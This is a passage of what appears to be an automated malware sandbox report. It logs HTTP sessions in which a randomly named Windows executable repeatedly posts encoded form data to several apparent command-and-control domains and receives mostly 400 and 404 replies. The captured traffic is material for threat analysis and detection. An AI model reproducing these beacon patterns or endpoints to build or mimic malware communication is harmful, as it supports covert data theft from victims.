                                                                                                            Data Ascii: 9PZt=NStUcy3QdCnATr7YdbjyySjAgyxamkvQdWxD+VwoPLTcuglP0zW82tFsj+0JMnzRVLCb8mPCLHiSzfGavbodiVeylQ/9A/P9R12V8IwayCSn49jPaO06LOySDIrYhkwF7rTxOcOyeCgbk/B1w8zk5GZD15qtGL9uBM6XASKgd9XJhM+Idcs6ATGngnFjbb9x6GhlNTELNevO
                                                                                                            Jan 11, 2025 04:26:34.955912113 CET190INHTTP/1.1 400 Bad Request
                                                                                                            Server: nginx
                                                                                                            Date: Sat, 11 Jan 2025 03:31:02 GMT
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                                            Data Ascii: d404 Not Found0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            18192.168.2.650010154.208.202.225801436C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 04:26:36.601918936 CET768OUTPOST /k6vm/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.zoomlive.live
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 233
                                                                                                            Connection: close
                                                                                                            Origin: http://www.zoomlive.live
                                                                                                            Referer: http://www.zoomlive.live/k6vm/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Data Raw: 39 50 5a 74 3d 4e 53 74 55 63 79 33 51 64 43 6e 41 53 49 6a 59 51 63 2f 79 6e 43 6a 48 38 69 78 61 39 30 75 5a 64 57 39 44 2b 52 6f 34 50 2f 2f 63 75 43 39 50 36 53 57 38 31 74 46 73 6f 65 30 4d 52 58 7a 65 56 4c 50 75 38 6a 50 43 4c 48 6d 53 7a 61 36 61 73 73 45 65 6a 46 65 77 74 77 2f 37 45 2f 50 39 52 31 32 56 38 4a 55 30 79 43 61 6e 34 50 33 50 61 74 73 35 55 2b 79 54 4b 6f 72 59 32 55 77 42 37 72 54 44 4f 64 69 55 65 41 49 62 6b 39 5a 31 7a 70 48 6a 77 47 5a 42 37 5a 72 6f 49 65 45 65 48 73 54 50 49 43 69 34 4b 2f 6a 76 6b 36 6a 53 42 76 73 5a 53 44 6d 6c 67 6c 64 52 62 37 39 62 34 47 5a 6c 66 45 49 73 43 71 4b 74 42 52 35 53 4c 59 63 4f 74 37 76 54 64 42 65 54 76 6d 41 6f 48 51 3d 3d
                                                                                                            Data Ascii: 9PZt=NStUcy3QdCnASIjYQc/ynCjH8ixa90uZdW9D+Ro4P//cuC9P6SW81tFsoe0MRXzeVLPu8jPCLHmSza6assEejFewtw/7E/P9R12V8JU0yCan4P3Pats5U+yTKorY2UwB7rTDOdiUeAIbk9Z1zpHjwGZB7ZroIeEeHsTPICi4K/jvk6jSBvsZSDmlgldRb79b4GZlfEIsCqKtBR5SLYcOt7vTdBeTvmAoHQ==
                                                                                                            Jan 11, 2025 04:26:37.526745081 CET190INHTTP/1.1 400 Bad Request
                                                                                                            Server: nginx
                                                                                                            Date: Sat, 11 Jan 2025 03:31:05 GMT
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                                            Data Ascii: d404 Not Found0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            19192.168.2.650011154.208.202.225801436C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 04:26:39.142880917 CET1781OUTPOST /k6vm/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.zoomlive.live
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 1245
                                                                                                            Connection: close
                                                                                                            Origin: http://www.zoomlive.live
                                                                                                            Referer: http://www.zoomlive.live/k6vm/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Data Raw: 39 50 5a 74 3d 4e 53 74 55 63 79 33 51 64 43 6e 41 53 49 6a 59 51 63 2f 79 6e 43 6a 48 38 69 78 61 39 30 75 5a 64 57 39 44 2b 52 6f 34 50 2b 72 63 76 78 31 50 36 78 2b 38 30 74 46 73 72 65 30 4e 52 58 7a 35 56 4c 58 71 38 6a 79 35 4c 46 4f 53 79 34 43 61 74 59 51 65 6f 46 65 77 76 77 2f 36 41 2f 50 53 52 31 47 5a 38 49 6b 30 79 43 61 6e 34 50 62 50 59 2b 30 35 57 2b 79 53 44 49 72 45 68 6b 78 63 37 72 4c 54 4f 64 6d 69 65 77 6f 62 6c 64 4a 31 31 62 66 6a 78 6d 5a 48 32 35 72 4f 49 65 41 42 48 71 33 44 49 43 6d 47 4b 2f 48 76 6b 2f 36 58 52 37 63 30 4d 7a 4c 47 78 58 56 4c 43 73 52 65 67 51 5a 31 57 58 73 32 61 6f 53 48 4b 42 4e 56 4a 5a 78 65 68 49 50 75 55 58 37 74 36 57 52 6d 64 79 59 38 50 35 41 4c 67 32 54 31 64 59 71 2b 75 36 34 33 6e 59 7a 64 7a 73 2f 5a 6b 56 77 47 56 39 47 78 54 59 55 76 78 48 51 38 42 39 4a 30 48 61 52 45 49 30 61 38 30 59 55 68 50 73 32 72 6c 35 67 44 6f 35 66 4d 49 5a 74 43 6e 62 30 2b 74 37 39 66 54 71 37 50 48 76 46 75 51 61 49 42 4a 38 4f 65 41 68 42 42 4b 31 6c 61 4f [TRUNCATED]
                                                                                                            Data Ascii: 9PZt=NStUcy3QdCnASIjYQc/ynCjH8ixa90uZdW9D+Ro4P+rcvx1P6x+80tFsre0NRXz5VLXq8jy5LFOSy4CatYQeoFewvw/6A/PSR1GZ8Ik0yCan4PbPY+05W+ySDIrEhkxc7rLTOdmiewobldJ11bfjxmZH25rOIeABHq3DICmGK/Hvk/6XR7c0MzLGxXVLCsRegQZ1WXs2aoSHKBNVJZxehIPuUX7t6WRmdyY8P5ALg2T1dYq+u643nYzdzs/ZkVwGV9GxTYUvxHQ8B9J0HaREI0a80YUhPs2rl5gDo5fMIZtCnb0+t79fTq7PHvFuQaIBJ8OeAhBBK1laOmKsiGAV7jNqtiFALKex5D3tAajAyESb78cHbJC8417Z+06e4pUJC0krtFtGPxbbbRDwNuFK1G0GjoLxU1q50qtDQqOfFwM4mzSO3IMOR9siCl1BTOB3CNzUdf3eR8XimHP7ubpjmyw8cDcXr0H87pSi+2jsZsgJugLDIes9EimfLoO61B7lPVgJlNHLcjEZ5rgRgrmXAlko3vngDYQRkz6OLhZeEbUPnZgC+PmeAj1hL1q3MRNYcsvIOrP2TDJNkZEk9MnVgiby39mhtvT46y0ML4jdDpXua26fzPjLW5/aMLxoN7N1LiWSL4TZSkchF4SB3z/Czv6ewWmBBjjdTAcx8wk1zM7EDGYwbtdypo6jwpm0rLkaimfCYOKT4+lcNFuMajLgk2UoCDgq8v2PZIrktmwI+mC2+IZqK0EzV5DVKGMdyc6j4XwmjU70PuZP6OF0EmbqefYOmCgmfJHtRTyYjeN+9162bvu1a41Gl8jrkP2wIos7IUc2NcXNa1bl74+nQdNpwQoSqzLK+oJ0oCTCHo0BvB/dJjS5Qga43D5LtkG86BEM3V3KhZUFCUrJpXei2oogRc/fN16yQNtTbAcjCUGyNYCa/Mtv2kJ757hDbfNdFkxKtwMOsLxj6oc+Vw6UQWegqMxsADFi2shroPrFB/C4wzbCLAq [TRUNCATED]
                                                                                                            Jan 11, 2025 04:26:40.085506916 CET190INHTTP/1.1 400 Bad Request
                                                                                                            Server: nginx
                                                                                                            Date: Sat, 11 Jan 2025 03:31:08 GMT
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                                            Data Ascii: d404 Not Found0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            20192.168.2.650012154.208.202.225801436C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 04:26:41.683470964 CET485OUTGET /k6vm/?I8A=fF8h_X3X0TB&9PZt=AQF0fE/xUBvXcoq8VPDc3VbpsTF0nlDqSFZLjGUQNoLeoSEU8z/8yZQb5sAEaF7nLYLL9iygL0eptKGi7pEnvFfogATAKvfKf2eq3ZcSrhy/qdqLc/JYZ8TgWJuF+1kS7eDlOqY= HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.zoomlive.live
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Jan 11, 2025 04:26:43.085395098 CET180INHTTP/1.1 503 Service Unavailable
                                                                                                            Server: nginx
                                                                                                            Date: Sat, 11 Jan 2025 03:31:11 GMT
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            21192.168.2.65001477.68.64.45801436C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 04:26:48.166335106 CET756OUTPOST /725g/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.dietcoffee.online
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 209
                                                                                                            Connection: close
                                                                                                            Origin: http://www.dietcoffee.online
                                                                                                            Referer: http://www.dietcoffee.online/725g/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Data Raw: 39 50 5a 74 3d 6a 67 6f 2b 6e 6d 52 54 6e 74 56 4e 48 50 41 71 7a 4b 4c 68 43 58 50 42 59 75 67 43 56 62 46 42 42 68 6c 65 32 76 4b 63 38 77 45 57 66 35 62 50 61 76 61 34 71 79 41 4d 57 6f 65 75 73 78 4a 6f 7a 6b 65 78 6d 79 6c 6b 49 4f 43 59 50 32 31 30 6d 56 58 41 6d 30 49 79 6e 39 79 74 71 30 34 55 6c 33 62 6c 2f 37 30 2b 75 79 4f 4b 32 59 4e 7a 4a 31 46 45 6d 77 36 77 32 52 31 79 68 4d 31 62 59 54 68 47 6f 31 52 78 57 71 5a 68 4e 37 56 41 75 57 46 71 74 6b 59 4c 79 6c 68 66 58 72 41 53 5a 68 5a 4c 35 49 6b 6b 30 5a 50 65 4b 74 33 35 41 64 6c 57 75 47 53 61 64 5a 56 6a 6b 4a 58 38 4d 47 69 78 77 72 78 7a 43 4b 6f 4b
                                                                                                            Data Ascii: 9PZt=jgo+nmRTntVNHPAqzKLhCXPBYugCVbFBBhle2vKc8wEWf5bPava4qyAMWoeusxJozkexmylkIOCYP210mVXAm0Iyn9ytq04Ul3bl/70+uyOK2YNzJ1FEmw6w2R1yhM1bYThGo1RxWqZhN7VAuWFqtkYLylhfXrASZhZL5Ikk0ZPeKt35AdlWuGSadZVjkJX8MGixwrxzCKoK
                                                                                                            Jan 11, 2025 04:26:48.756928921 CET393INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx/1.25.3
                                                                                                            Date: Sat, 11 Jan 2025 03:26:49 GMT
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Content-Encoding: gzip
                                                                                                            Data Raw: 62 35 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb 2c 12 8c 97 a6 07 f9 89 24 88 c4 d4 83 47 4c ab 25 41 8a b4 68 7c 7b 0b 5c 3c ce ce cc 37 4b 57 c9 29 e6 d7 2a 85 03 3f 16 50 5d f6 45 1e 83 b7 46 cc 53 9e 21 26 3c 59 9c d0 0f 10 d3 d2 63 84 2a fb 6c 19 55 b2 16 4e d8 c6 b6 92 45 41 04 a5 b6 90 e9 b1 13 14 97 23 a1 38 87 e8 4d 8b ef d4 db b0 bf 8c 53 84 f6 8c 2b 09 83 7c 8d d2 58 29 e0 72 2e 00 77 e1 f6 81 f0 a9 0d 74 0e 79 9f 90 a0 3b b0 aa 31 60 e4 f0 96 83 4f b1 77 6d 9c c1 6e 65 7a 88 fc 00 4e 5b 37 b5 cb 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                            Data Ascii: b5M0},$GL%Ah|{\<7KW)*?P]EFS!&<Yc*lUNEA#8MS+|X)r.wty;1`OwmnezN[70


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            22192.168.2.65001577.68.64.45801436C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 04:26:50.723418951 CET780OUTPOST /725g/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.dietcoffee.online
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 233
                                                                                                            Connection: close
                                                                                                            Origin: http://www.dietcoffee.online
                                                                                                            Referer: http://www.dietcoffee.online/725g/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Data Raw: 39 50 5a 74 3d 6a 67 6f 2b 6e 6d 52 54 6e 74 56 4e 56 2f 77 71 32 6f 6a 68 45 33 50 43 58 4f 67 43 62 37 46 46 42 68 70 65 32 75 4f 32 39 46 63 57 52 38 6e 50 62 75 61 34 70 79 41 4d 65 49 65 68 69 52 49 6b 7a 6b 43 44 6d 7a 70 6b 49 4f 47 59 50 33 46 30 6d 6b 58 42 6d 6b 49 30 72 64 79 76 6c 55 34 55 6c 33 62 6c 2f 37 77 45 75 79 57 4b 32 6f 39 7a 49 55 46 48 76 51 36 33 78 52 31 79 71 73 31 58 59 54 67 6a 6f 77 78 66 57 73 64 68 4e 37 6c 41 33 6e 46 74 6e 6b 59 46 2f 46 67 32 62 36 70 67 54 67 59 68 31 72 30 63 69 35 76 31 50 62 71 6a 63 75 6c 31 38 57 79 59 64 62 4e 52 6b 70 58 57 4f 47 61 78 69 38 39 55 4e 2b 4e 70 74 49 55 2f 43 56 59 51 6d 6c 78 42 2f 51 65 58 51 5a 64 39 61 77 3d 3d
                                                                                                            Data Ascii: 9PZt=jgo+nmRTntVNV/wq2ojhE3PCXOgCb7FFBhpe2uO29FcWR8nPbua4pyAMeIehiRIkzkCDmzpkIOGYP3F0mkXBmkI0rdyvlU4Ul3bl/7wEuyWK2o9zIUFHvQ63xR1yqs1XYTgjowxfWsdhN7lA3nFtnkYF/Fg2b6pgTgYh1r0ci5v1Pbqjcul18WyYdbNRkpXWOGaxi89UN+NptIU/CVYQmlxB/QeXQZd9aw==
                                                                                                            Jan 11, 2025 04:26:51.299280882 CET393INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx/1.25.3
                                                                                                            Date: Sat, 11 Jan 2025 03:26:52 GMT
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Content-Encoding: gzip
                                                                                                            Data Raw: 62 35 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb 2c 12 8c 97 a6 07 f9 89 24 88 c4 d4 83 47 4c ab 25 41 8a b4 68 7c 7b 0b 5c 3c ce ce cc 37 4b 57 c9 29 e6 d7 2a 85 03 3f 16 50 5d f6 45 1e 83 b7 46 cc 53 9e 21 26 3c 59 9c d0 0f 10 d3 d2 63 84 2a fb 6c 19 55 b2 16 4e d8 c6 b6 92 45 41 04 a5 b6 90 e9 b1 13 14 97 23 a1 38 87 e8 4d 8b ef d4 db b0 bf 8c 53 84 f6 8c 2b 09 83 7c 8d d2 58 29 e0 72 2e 00 77 e1 f6 81 f0 a9 0d 74 0e 79 9f 90 a0 3b b0 aa 31 60 e4 f0 96 83 4f b1 77 6d 9c c1 6e 65 7a 88 fc 00 4e 5b 37 b5 cb 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                            Data Ascii: b5M0},$GL%Ah|{\<7KW)*?P]EFS!&<Yc*lUNEA#8MS+|X)r.wty;1`OwmnezN[70


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            23192.168.2.65001677.68.64.45801436C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 04:26:53.271564007 CET1793OUTPOST /725g/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.dietcoffee.online
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 1245
                                                                                                            Connection: close
                                                                                                            Origin: http://www.dietcoffee.online
                                                                                                            Referer: http://www.dietcoffee.online/725g/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Data Raw: 39 50 5a 74 3d 6a 67 6f 2b 6e 6d 52 54 6e 74 56 4e 56 2f 77 71 32 6f 6a 68 45 33 50 43 58 4f 67 43 62 37 46 46 42 68 70 65 32 75 4f 32 39 46 55 57 52 4f 66 50 64 4e 79 34 6f 79 41 4d 55 6f 65 69 69 52 49 74 7a 6b 4b 48 6d 7a 31 30 49 4e 75 59 50 52 5a 30 67 51 44 42 7a 55 49 30 6a 39 79 73 71 30 35 57 6c 33 4c 70 2f 37 67 45 75 79 57 4b 32 75 35 7a 59 31 46 48 70 51 36 77 32 52 31 75 68 4d 30 49 59 54 34 56 6f 77 46 68 58 63 39 68 4e 66 42 41 73 31 74 74 72 6b 59 48 73 31 67 75 62 36 31 37 54 67 45 36 31 71 77 32 69 36 7a 31 4e 73 4c 34 48 63 73 69 69 6b 65 68 49 38 70 53 38 76 6e 37 44 45 61 31 72 75 6c 37 49 39 38 47 6f 64 38 6f 48 6c 4e 56 75 45 30 30 37 55 7a 68 64 71 67 33 49 4f 64 2b 53 44 43 47 41 32 44 6d 64 2b 33 30 44 50 6c 52 6e 5a 45 36 52 31 54 67 46 4d 32 64 6c 74 6a 6f 41 44 34 47 6e 6c 6a 78 61 34 6f 53 30 50 79 2f 38 66 43 75 76 51 2f 59 50 46 31 35 5a 62 70 54 59 36 32 48 6d 70 4b 69 57 56 34 77 72 63 57 4b 35 31 39 52 51 76 32 65 2f 4b 42 2b 35 43 36 33 41 6b 42 4d 71 73 34 51 54 [TRUNCATED]
                                                                                                            Data Ascii: 9PZt=jgo+nmRTntVNV/wq2ojhE3PCXOgCb7FFBhpe2uO29FUWROfPdNy4oyAMUoeiiRItzkKHmz10INuYPRZ0gQDBzUI0j9ysq05Wl3Lp/7gEuyWK2u5zY1FHpQ6w2R1uhM0IYT4VowFhXc9hNfBAs1ttrkYHs1gub617TgE61qw2i6z1NsL4HcsiikehI8pS8vn7DEa1rul7I98God8oHlNVuE007Uzhdqg3IOd+SDCGA2Dmd+30DPlRnZE6R1TgFM2dltjoAD4Gnljxa4oS0Py/8fCuvQ/YPF15ZbpTY62HmpKiWV4wrcWK519RQv2e/KB+5C63AkBMqs4QTKHtYU6jU36A48BbAJxTfzaNdI4BXcD5ZiMfQF017FySUtFXUUjEWhHoLXj696Z36eMpVYFJFaSSKjd+mL2xfX8sCBE7oB+wJW/QACu5Oa3G6M4rQMiO6XUvsniud0q1HPUd9/SKkFcdcdD2DhMTw7cj5ZCpWHPd9xNYeWV2HFK3LCi733wUUT+2Yzs7vzp+mD7YgoIB+MZ0AoX3oFnur3OQQ2vvEXOVDnyvM7HbJDG2+eOgZm5xJvLDWxzLaTWcl+OO/Of+Naxn995y1EKvjaRTPrW0WPuUeVWqZKxDZ+1UDmKhWMqTUXXrb+lO+qRHj1HU+oB/VvuVRgcs971O89Gkis/j/i9S5FUYKS/F+GU/lBu6/AD0Dv+cpa3y09pzzz5ZKsa3IuA6IJK/Dl21PkHHjGX0aMuthzbtMHcl1maeQDI+7U2yTbiPVhpDt2OV4vwLNrBsboU4nCs01MO98DH6OBcOZr3mxoUzG/d/bpBdpVDRsW/pIJ6T9vYYQXD36S0i8lStuMWqUEZeqTl0jogjYk+x2dMEyTHERB8bAbN/s1T/zHNCMn4Hn6N6t7i3fSZvVsO7wY6mwiAOGxATEwhchj9yDpPhwQVmCTaW4UwiVKRqlDjvvS5GhAtwx6puBXKiZ1KOS4D+vOzFdV40piNGz2SNIGl1eJ8 [TRUNCATED]
                                                                                                            Jan 11, 2025 04:26:53.846975088 CET393INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx/1.25.3
                                                                                                            Date: Sat, 11 Jan 2025 03:26:54 GMT
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Content-Encoding: gzip
                                                                                                            Data Raw: 62 35 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb 2c 12 8c 97 a6 07 f9 89 24 88 c4 d4 83 47 4c ab 25 41 8a b4 68 7c 7b 0b 5c 3c ce ce cc 37 4b 57 c9 29 e6 d7 2a 85 03 3f 16 50 5d f6 45 1e 83 b7 46 cc 53 9e 21 26 3c 59 9c d0 0f 10 d3 d2 63 84 2a fb 6c 19 55 b2 16 4e d8 c6 b6 92 45 41 04 a5 b6 90 e9 b1 13 14 97 23 a1 38 87 e8 4d 8b ef d4 db b0 bf 8c 53 84 f6 8c 2b 09 83 7c 8d d2 58 29 e0 72 2e 00 77 e1 f6 81 f0 a9 0d 74 0e 79 9f 90 a0 3b b0 aa 31 60 e4 f0 96 83 4f b1 77 6d 9c c1 6e 65 7a 88 fc 00 4e 5b 37 b5 cb 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                            Data Ascii: b5M0},$GL%Ah|{\<7KW)*?P]EFS!&<Yc*lUNEA#8MS+|X)r.wty;1`OwmnezN[70


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            24192.168.2.65001777.68.64.45801436C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 04:26:55.811008930 CET489OUTGET /725g/?9PZt=uiAekWsFoddhMu9w6av3IR3qRfkxEYhiHCdKsu6SwDAva+OcXfn0u3hNB8zZhz0kzkOslwZXAdf6Zktj+FCGjzQZh9bjjklx+lq67asD3Aqsp6I0O3QatHKxujksh8AYT18lk1s=&I8A=fF8h_X3X0TB HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.dietcoffee.online
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Jan 11, 2025 04:26:56.407304049 CET373INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx/1.25.3
                                                                                                            Date: Sat, 11 Jan 2025 03:26:57 GMT
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Content-Length: 203
                                                                                                            Connection: close
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 37 32 35 67 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /725g/ was not found on this server.</p></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            25192.168.2.650018208.91.197.27801436C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 04:27:01.692235947 CET753OUTPOST /v2ut/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.guacamask.online
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 209
                                                                                                            Connection: close
                                                                                                            Origin: http://www.guacamask.online
                                                                                                            Referer: http://www.guacamask.online/v2ut/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
